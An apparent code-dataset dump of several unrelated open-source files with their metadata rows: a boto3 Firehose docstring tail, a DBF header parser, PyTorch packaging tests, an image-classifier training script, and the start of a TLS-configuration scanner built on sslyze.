logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ElasticsearchDestinationUpdate: dict
:param ElasticsearchDestinationUpdate: Describes an update for a destination in Amazon ES.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the IAM role to be assumed by Kinesis Data Firehose for calling the Amazon ES Configuration API and for indexing documents. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination and Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nDomainARN (string) --The ARN of the Amazon ES domain. The IAM role must have permissions for DescribeElasticsearchDomain , DescribeElasticsearchDomains , and DescribeElasticsearchDomainConfig after assuming the IAM role specified in RoleARN . For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\nSpecify either ClusterEndpoint or DomainARN .\n\nClusterEndpoint (string) --The endpoint to use when communicating with the cluster. Specify either this ClusterEndpoint or the DomainARN field.\n\nIndexName (string) --The Elasticsearch index name.\n\nTypeName (string) --The Elasticsearch type name. For Elasticsearch 6.x, there can be only one type per index. If you try to specify a new type for an existing index that already has another type, Kinesis Data Firehose returns an error during runtime.\nIf you upgrade Elasticsearch from 6.x to 7.x and don\xe2\x80\x99t update your delivery stream, Kinesis Data Firehose still delivers data to Elasticsearch with the old index name and type name. If you want to update your delivery stream with a new index name, provide an empty string for TypeName .\n\nIndexRotationPeriod (string) --The Elasticsearch index rotation period. Index rotation appends a timestamp to IndexName to facilitate the expiration of old data. For more information, see Index Rotation for the Amazon ES Destination . Default value is OneDay .\n\nBufferingHints (dict) --The buffering options. If no value is specified, ElasticsearchBufferingHints object default values are used.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.\n\n\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon ES. The default value is 300 (5 minutes).\n\nDurationInSeconds (integer) --After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.\n\n\n\nS3Update (dict) --The Amazon S3 destination.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type SplunkDestinationUpdate: dict
:param SplunkDestinationUpdate: Describes an update for a destination in Splunk.\n\nHECEndpoint (string) --The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.\n\nHECEndpointType (string) --This type can be either 'Raw' or 'Event.'\n\nHECToken (string) --A GUID that you obtain from your Splunk cluster when you create a new HEC endpoint.\n\nHECAcknowledgmentTimeoutInSeconds (integer) --The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk or if it doesn\'t receive an acknowledgment of receipt from Splunk.\n\nDurationInSeconds (integer) --The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.\n\n\n\nS3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .\n\nS3Update (dict) --Your update to the configuration of the backup Amazon S3 location.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.ResourceNotFoundException
Firehose.Client.exceptions.ConcurrentModificationException
:return: {}
:returns:
(dict) --
"""
pass
| 68.809805 | 14,817 | 0.682587 |
03a877c8706cbafeeafce0b78894f503c89545bb | 9,388 | py | Python | env/lib/python3.6/site-packages/tablib/packages/dbfpy/header.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | env/lib/python3.6/site-packages/tablib/packages/dbfpy/header.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | env/lib/python3.6/site-packages/tablib/packages/dbfpy/header.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | """DBF header definition.
TODO:
- handle encoding of the character fields
(encoding information stored in the DBF header)
"""
"""History (most recent first):
16-sep-2010 [als] fromStream: fix century of the last update field
11-feb-2007 [als] added .ignoreErrors
10-feb-2007 [als] added __getitem__: return field definitions
by field name or field number (zero-based)
04-jul-2006 [als] added export declaration
15-dec-2005 [yc] created
"""
__version__ = "$Revision: 1.6 $"[11:-2]
__date__ = "$Date: 2010/09/16 05:06:39 $"[7:-2]
__all__ = ["DbfHeader"]
try:
import cStringIO
except ImportError:
# when we're in python3, we cStringIO has been replaced by io.StringIO
import io as cStringIO
import datetime
import struct
import time
from . import fields
from . import utils
class DbfHeader(object):
"""Dbf header definition.
For more information about dbf header format visit
`http://www.clicketyclick.dk/databases/xbase/format/dbf.html#DBF_STRUCT`
Examples:
Create an empty dbf header and add some field definitions:
dbfh = DbfHeader()
dbfh.addField(("name", "C", 10))
dbfh.addField(("date", "D"))
dbfh.addField(DbfNumericFieldDef("price", 5, 2))
Create a dbf header with field definitions:
dbfh = DbfHeader([
("name", "C", 10),
("date", "D"),
DbfNumericFieldDef("price", 5, 2),
])
"""
__slots__ = ("signature", "fields", "lastUpdate", "recordLength",
"recordCount", "headerLength", "changed", "_ignore_errors")
## instance construction and initialization methods
def __init__(self, fields=None, headerLength=0, recordLength=0,
recordCount=0, signature=0x03, lastUpdate=None, ignoreErrors=False,
):
"""Initialize instance.
Arguments:
fields:
a list of field definitions;
recordLength:
size of the records;
headerLength:
size of the header;
recordCount:
number of records stored in DBF;
signature:
version number (aka signature). using 0x03 as a default meaning
"File without DBT". for more information about this field visit
``http://www.clicketyclick.dk/databases/xbase/format/dbf.html#DBF_NOTE_1_TARGET``
lastUpdate:
date of the DBF's update. this could be a string ('yymmdd' or
'yyyymmdd'), timestamp (int or float), datetime/date value,
a sequence (assuming (yyyy, mm, dd, ...)) or an object having
callable ``ticks`` field.
ignoreErrors:
error processing mode for DBF fields (boolean)
"""
self.signature = signature
if fields is None:
self.fields = []
else:
self.fields = list(fields)
self.lastUpdate = utils.getDate(lastUpdate)
self.recordLength = recordLength
self.headerLength = headerLength
self.recordCount = recordCount
self.ignoreErrors = ignoreErrors
# XXX: I'm not sure this is safe to
# initialize `self.changed` in this way
self.changed = bool(self.fields)
# @classmethod
def fromString(cls, string):
"""Return header instance from the string object."""
return cls.fromStream(cStringIO.StringIO(str(string)))
fromString = classmethod(fromString)
# @classmethod
def fromStream(cls, stream):
"""Return header object from the stream."""
stream.seek(0)
_data = stream.read(32)
(_cnt, _hdrLen, _recLen) = struct.unpack("<I2H", _data[4:12])
#reserved = _data[12:32]
_year = ord(_data[1])
if _year < 80:
# dBase II started at 1980. It is quite unlikely
# that actual last update date is before that year.
_year += 2000
else:
_year += 1900
## create header object
_obj = cls(None, _hdrLen, _recLen, _cnt, ord(_data[0]),
(_year, ord(_data[2]), ord(_data[3])))
## append field definitions
# position 0 is for the deletion flag
_pos = 1
_data = stream.read(1)
# The field definitions are ended either by \x0D OR a newline
# character, so we need to handle both when reading from a stream.
# When writing, dbfpy appears to write newlines instead of \x0D.
while _data[0] not in ["\x0D", "\n"]:
_data += stream.read(31)
_fld = fields.lookupFor(_data[11]).fromString(_data, _pos)
_obj._addField(_fld)
_pos = _fld.end
_data = stream.read(1)
return _obj
fromStream = classmethod(fromStream)
## properties
year = property(lambda self: self.lastUpdate.year)
month = property(lambda self: self.lastUpdate.month)
day = property(lambda self: self.lastUpdate.day)
def ignoreErrors(self, value):
"""Update `ignoreErrors` flag on self and all fields"""
self._ignore_errors = value = bool(value)
for _field in self.fields:
_field.ignoreErrors = value
ignoreErrors = property(
lambda self: self._ignore_errors,
ignoreErrors,
doc="""Error processing mode for DBF field value conversion
if set, failing field value conversion will return
``INVALID_VALUE`` instead of raising conversion error.
""")
## object representation
def __repr__(self):
_rv = """\
Version (signature): 0x%02x
Last update: %s
Header length: %d
Record length: %d
Record count: %d
FieldName Type Len Dec
""" % (self.signature, self.lastUpdate, self.headerLength,
self.recordLength, self.recordCount)
_rv += "\n".join(
["%10s %4s %3s %3s" % _fld.fieldInfo() for _fld in self.fields]
)
return _rv
## internal methods
def _addField(self, *defs):
"""Internal variant of the `addField` method.
This method doesn't set `self.changed` field to True.
Return value is a length of the appended records.
Note: this method doesn't modify ``recordLength`` and
``headerLength`` fields. Use `addField` instead of this
method if you don't exactly know what you're doing.
"""
# insure we have dbf.DbfFieldDef instances first (instantiation
# from the tuple could raise an error, in such a case I don't
# wanna add any of the definitions -- all will be ignored)
_defs = []
_recordLength = 0
for _def in defs:
if isinstance(_def, fields.DbfFieldDef):
_obj = _def
else:
(_name, _type, _len, _dec) = (tuple(_def) + (None,) * 4)[:4]
_cls = fields.lookupFor(_type)
_obj = _cls(_name, _len, _dec,
ignoreErrors=self._ignore_errors)
_recordLength += _obj.length
_defs.append(_obj)
# and now extend field definitions and
# update record length
self.fields += _defs
return _recordLength
## interface methods
def addField(self, *defs):
"""Add field definition to the header.
Examples:
dbfh.addField(
("name", "C", 20),
dbf.DbfCharacterFieldDef("surname", 20),
dbf.DbfDateFieldDef("birthdate"),
("member", "L"),
)
dbfh.addField(("price", "N", 5, 2))
dbfh.addField(dbf.DbfNumericFieldDef("origprice", 5, 2))
"""
_oldLen = self.recordLength
self.recordLength += self._addField(*defs)
if not _oldLen:
self.recordLength += 1
# XXX: may be just use:
# self.recordeLength += self._addField(*defs) + bool(not _oldLen)
# recalculate headerLength
self.headerLength = 32 + (32 * len(self.fields)) + 1
self.changed = True
def write(self, stream):
"""Encode and write header to the stream."""
stream.seek(0)
stream.write(self.toString())
stream.write("".join([_fld.toString() for _fld in self.fields]))
stream.write(chr(0x0D)) # cr at end of all hdr data
self.changed = False
def toString(self):
"""Returned 32 chars length string with encoded header."""
return struct.pack("<4BI2H",
self.signature,
self.year - 1900,
self.month,
self.day,
self.recordCount,
self.headerLength,
self.recordLength) + "\0" * 20
def setCurrentDate(self):
"""Update ``self.lastUpdate`` field with current date value."""
self.lastUpdate = datetime.date.today()
def __getitem__(self, item):
"""Return a field definition by numeric index or name string"""
if isinstance(item, basestring):
_name = item.upper()
for _field in self.fields:
if _field.name == _name:
return _field
else:
raise KeyError(item)
else:
# item must be field index
return self.fields[item]
# vim: et sts=4 sw=4 :
| 34.014493 | 97 | 0.583085 |
017b190ed100e2917c82eadad7ce3ff22f07a52c | 7,772 | py | Python | train.py | koderjoker/Image-Classifier | 161b61425eb1ff906ac9a685f2750ef8fb0261ac | [
"MIT"
] | null | null | null | train.py | koderjoker/Image-Classifier | 161b61425eb1ff906ac9a685f2750ef8fb0261ac | [
"MIT"
] | null | null | null | train.py | koderjoker/Image-Classifier | 161b61425eb1ff906ac9a685f2750ef8fb0261ac | [
"MIT"
] | 1 | 2021-04-14T17:29:36.000Z | 2021-04-14T17:29:36.000Z | import argparse
import torch
from torch import nn
from torch import optim
from torchvision import transforms, datasets, models
from collections import OrderedDict
import json
#Take inputs from user
parser = argparse.ArgumentParser()
parser.add_argument('data_directory', type=str, help='Train a new network on a data set')
parser.add_argument('--save_dir', type=str, help='Set directory to save checkpoint', default='./')
parser.add_argument('--category', type=str, help='Load categories', default='cat_to_name.json')
parser.add_argument('--arch', type=str, help='Choose architecture', default='vgg16')
parser.add_argument('--learning_rate', type=float, help='Set learning rate', default=0.0001)
parser.add_argument('--hidden_units', type=int, help='Set hidden units', default=510)
parser.add_argument('--epochs', type=int, help='Set epochs', default=8)
parser.add_argument('--dropout', type=float, help='Set dropout', default=0.1)
parser.add_argument('--gpu', type=str, help='Use GPU for training', default='gpu')
args = parser.parse_args()
#Start training! :)
# Load data (assuming folders are available for training, validation and testing)
data_dir = args.data_directory
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# Define transformations
data_transforms = {'train_transforms': transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(30),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])]),
'valid_transforms': transforms.Compose([transforms.RandomResizedCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])]),
'test_transforms': transforms.Compose([transforms.RandomResizedCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
}
# Load the datasets
image_datasets = {'train_data': datasets.ImageFolder(train_dir, transform=data_transforms['train_transforms']),
'valid_data': datasets.ImageFolder(valid_dir, transform=data_transforms['valid_transforms']),
'test_data': datasets.ImageFolder(valid_dir, transform=data_transforms['test_transforms'])
}
# Define the dataloaders
dataloaders= {'trainloader': torch.utils.data.DataLoader(image_datasets['train_data'], batch_size=64, shuffle=True),
'validloader': torch.utils.data.DataLoader(image_datasets['valid_data'], batch_size=32, shuffle=True),
'testloader': torch.utils.data.DataLoader(image_datasets['test_data'], batch_size=32, shuffle=True)
}
# Load a model and create a classifier
def load_train_model(arch, category, hidden_units, dropout, gpu, learning_rate, epochs, save_dir):
# Load category
with open(category, 'r') as f:
cat_to_name = json.load(f)
# Choose from vgg16 and densenet121 architecture
if arch == "vgg16":
model = models.vgg16(pretrained=True)
in_features = 25088
elif arch == "densenet121":
model = models.densenet121(pretrained=True)
in_features = 1024
# Output is number of types of images
out_features = len(cat_to_name)
#Freeze parameters
for param in model.parameters():
param.requires_grad = False
#Create classifier
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(in_features, hidden_units)),
('relu1', nn.ReLU()),
('dropout1', nn.Dropout(dropout)),
('fc2', nn.Linear(hidden_units, out_features)),
('output', nn.LogSoftmax(dim=1))
]))
#Replace vgg16 classifier with self built classifier
model.classifier = classifier
#Use gpu if given as parameter
if gpu == "gpu":
device = "cuda:0"
elif gpu == "cpu":
device = "cpu"
model.to(device)
#Criterion and optimizer
#Update weights of parameters (use momentum)
optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)
#Define loss (Negative log likelihood loss)
criterion = nn.NLLLoss()
#Train classifier layers using backpropogation, track loss and accuracy
epoch = epochs
print_every = 50
steps = 0
for e in range(epoch):
running_loss = 0
for images, labels in iter(dataloaders['trainloader']):
#Training mode- dropout on
model.train()
steps += 1
#Shift to gpu
images, labels = images.to(device), labels.to(device)
#Reset optimizer to 0
optimizer.zero_grad()
#Forward and backward passes
output = model.forward(images)
loss = criterion(output, labels)
loss.backward()
optimizer.step()
#Track loss
running_loss += loss.item()
#Print loss every 50 steps
if steps % print_every == 0:
#Evaluation mode- dropout turned off
model.eval()
#Turn off gradients
with torch.no_grad():
valid_loss, accuracy = validation(model, dataloaders['validloader'], criterion, device)
print("Epoch: {}/{}..".format(e+1,epoch),
"Training Loss: {:.3f}..".format(running_loss/print_every),
"Validation Loss: {:.3f}..".format(valid_loss/len(dataloaders['validloader'])),
"Validation Accuracy: {:.3f}%..".format(100*(accuracy/len(dataloaders['validloader']))))
running_loss = 0
#Training mode- dropout truned on
model.train()
model.to('cpu')
save(arch, classifier, epoch, optimizer.state_dict(), model.state_dict(), image_datasets['train_data'].class_to_idx, save_dir)
#Function for validation
def validation(model, loader, criterion, device):
loss = 0
accuracy = 0
for images, labels in iter(loader):
#Shift to gpu
images, labels = images.to(device), labels.to(device)
#Move to next image and calculate loss
output = model.forward(images)
loss += criterion(output, labels).item()
#Take exponent of log output
ps = torch.exp(output)
#Compare label with predicted class
equality = (labels.data == ps.max(dim=1)[1])
#Correct predictions/Total predictions
accuracy += equality.type(torch.FloatTensor).mean()
return loss, accuracy
def save(arch, classifier, epoch, optimizer, state_dict, class_to_idx, save_dir):
checkpoint = {'model': arch,
'classifier': classifier,
'epoch': epoch,
'optimizer': optimizer,
'state_dict': state_dict,
'class_to_idx': class_to_idx
}
torch.save(checkpoint, save_dir + 'checkpoint.pth')
load_train_model(args.arch, args.category, args.hidden_units, args.dropout, args.gpu, args.learning_rate, args.epochs, args.save_dir) | 40.691099 | 133 | 0.590453 |
0541d6a77e2e8cb6b20b083c3844ed74a8c6877d | 3,958 | py | Python | test/package/test_dependency_hooks.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | test/package/test_dependency_hooks.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | test/package/test_dependency_hooks.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | from io import BytesIO
from torch.package import (
PackageExporter,
)
from torch.testing._internal.common_utils import run_tests
try:
from .common import PackageTestCase
except ImportError:
# Support the case where we run this file directly.
from common import PackageTestCase
class TestDependencyHooks(PackageTestCase):
"""Dependency management hooks API tests.
- register_mock_hook()
- register_extern_hook()
"""
def test_single_hook(self):
buffer = BytesIO()
my_externs = set()
def my_extern_hook(package_exporter, module_name):
my_externs.add(module_name)
with PackageExporter(buffer) as exporter:
exporter.extern(["package_a.subpackage", "module_a"])
exporter.register_extern_hook(my_extern_hook)
exporter.save_source_string("foo", "import module_a")
self.assertEqual(my_externs, set(["module_a"]))
def test_multiple_extern_hooks(self):
buffer = BytesIO()
my_externs = set()
def my_extern_hook(package_exporter, module_name):
my_externs.add(module_name)
# This also checks ordering, since `remove()` will fail if the value is not in the set.
def my_extern_hook2(package_exporter, module_name):
my_externs.remove(module_name)
with PackageExporter(buffer) as exporter:
exporter.extern(["package_a.subpackage", "module_a"])
exporter.register_extern_hook(my_extern_hook)
exporter.register_extern_hook(my_extern_hook2)
exporter.save_source_string("foo", "import module_a")
self.assertEqual(my_externs, set())
def test_multiple_mock_hooks(self):
buffer = BytesIO()
my_mocks = set()
def my_mock_hook(package_exporter, module_name):
my_mocks.add(module_name)
# This also checks ordering, since `remove()` will fail if the value is not in the set.
def my_mock_hook2(package_exporter, module_name):
my_mocks.remove(module_name)
with PackageExporter(buffer) as exporter:
exporter.mock(["package_a.subpackage", "module_a"])
exporter.register_mock_hook(my_mock_hook)
exporter.register_mock_hook(my_mock_hook2)
exporter.save_source_string("foo", "import module_a")
self.assertEqual(my_mocks, set())
def test_remove_hooks(self):
buffer = BytesIO()
my_externs = set()
my_externs2 = set()
def my_extern_hook(package_exporter, module_name):
my_externs.add(module_name)
def my_extern_hook2(package_exporter, module_name):
my_externs2.add(module_name)
with PackageExporter(buffer) as exporter:
exporter.extern(["package_a.subpackage", "module_a"])
handle = exporter.register_extern_hook(my_extern_hook)
exporter.register_extern_hook(my_extern_hook2)
handle.remove()
exporter.save_source_string("foo", "import module_a")
self.assertEqual(my_externs, set())
self.assertEqual(my_externs2, set(["module_a"]))
def test_extern_and_mock_hook(self):
buffer = BytesIO()
my_externs = set()
my_mocks = set()
def my_extern_hook(package_exporter, module_name):
my_externs.add(module_name)
def my_mock_hook(package_exporter, module_name):
my_mocks.add(module_name)
with PackageExporter(buffer) as exporter:
exporter.extern("module_a")
exporter.mock("package_a")
exporter.register_extern_hook(my_extern_hook)
exporter.register_mock_hook(my_mock_hook)
exporter.save_source_string("foo", "import module_a; import package_a")
self.assertEqual(my_externs, set(["module_a"]))
self.assertEqual(my_mocks, set(["package_a"]))
if __name__ == "__main__":
run_tests()
| 32.178862 | 95 | 0.662961 |
61a2c4cc07165652fda0c8a7b0dcda83f0764873 | 29,962 | py | Python | scanners/sslyze.py | eddietejeda/domain-scan | ad2bfaae5b17437c994d8f1ce50c9f9bcecade8b | [
"CC0-1.0"
] | null | null | null | scanners/sslyze.py | eddietejeda/domain-scan | ad2bfaae5b17437c994d8f1ce50c9f9bcecade8b | [
"CC0-1.0"
] | null | null | null | scanners/sslyze.py | eddietejeda/domain-scan | ad2bfaae5b17437c994d8f1ce50c9f9bcecade8b | [
"CC0-1.0"
] | null | null | null | ###
# Inspect a site's TLS configuration using sslyze.
#
# If data exists for a domain from `pshtt`, will check results
# and only process domains with valid HTTPS, or broken chains.
#
# Supported options:
#
# --sslyze-serial - If set, will use a synchronous (single-threaded
# in-process) scanner. Defaults to true.
# --sslyze-certs - If set, will use the CertificateInfoScanner and
# return certificate info. Defaults to true.
###
import logging
from typing import Any
from sslyze.server_connectivity_tester import ServerConnectivityTester, ServerConnectivityError
from sslyze.synchronous_scanner import SynchronousScanner
from sslyze.concurrent_scanner import ConcurrentScanner, PluginRaisedExceptionScanResult
from sslyze.plugins.openssl_cipher_suites_plugin import Tlsv10ScanCommand, Tlsv11ScanCommand, Tlsv12ScanCommand, Tlsv13ScanCommand, Sslv20ScanCommand, Sslv30ScanCommand
from sslyze.plugins.certificate_info_plugin import CertificateInfoScanCommand
from sslyze.ssl_settings import TlsWrappedProtocolEnum
import idna
import cryptography
import cryptography.hazmat.backends.openssl
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.asymmetric import ec, dsa, rsa
from utils import FAST_CACHE_KEY, utils
# Number of seconds to wait during sslyze connection check.
# Not much patience here, and very willing to move on.
network_timeout = 5
# Advertise Lambda support
lambda_support = True
# If we have pshtt data, use it to skip some domains, and to adjust
# scan hostnames to canonical URLs where we can.
#
# If we have trustymail data, use it to identify any mail servers that
# support STARTTLS so we can scan them.
#
# Check the fastcache to determine if we have already tested any of
# the mail servers when scanning other domains.
def init_domain(domain, environment, options):
hosts_to_scan = []
cached_data = []
cache_dir = options.get('_', {}).get('cache_dir', './cache')
# If we have pshtt data, skip domains which pshtt saw as not
# supporting HTTPS at all.
if utils.domain_doesnt_support_https(domain, cache_dir=cache_dir):
logging.warning('\tHTTPS not supported for {}'.format(domain))
else:
# If we have pshtt data and it says canonical endpoint uses
# www and the given domain is bare, add www.
if utils.domain_uses_www(domain, cache_dir=cache_dir):
hostname = 'www.%s' % domain
else:
hostname = domain
hosts_to_scan.append({
'hostname': hostname,
'port': 443,
'starttls_smtp': False
})
# If we have trustymail data, see if there are any mail servers
# that support STARTTLS that we should scan
mail_servers_to_test = utils.domain_mail_servers_that_support_starttls(domain, cache_dir=cache_dir)
for mail_server in mail_servers_to_test:
# Check if we already have results for this mail server,
# possibly from a different domain.
#
# I have found that SMTP servers (as compared to HTTP/HTTPS
# servers) are MUCH more sensitive to having multiple
